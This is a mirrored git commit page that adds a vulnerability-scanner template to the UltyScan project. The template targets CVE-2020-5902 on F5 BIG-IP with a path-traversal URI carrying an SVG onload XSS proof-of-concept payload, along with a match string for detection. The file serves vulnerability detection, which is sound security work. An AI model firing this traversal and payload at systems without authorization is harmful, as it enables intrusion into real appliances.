mirror of
https://github.com/DeNNiiInc/UltyScan.git
synced 2026-04-17 22:46:00 +00:00
UltyScan Documentation Overhaul
This commit is contained in:
9
templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh
Normal file
9
templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh
Normal file
@@ -0,0 +1,9 @@
|
||||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
|
||||
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
|
||||
METHOD='GET'
|
||||
MATCH="<svg/onload=alert\(1337\)>"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
Reference in New Issue
Block a user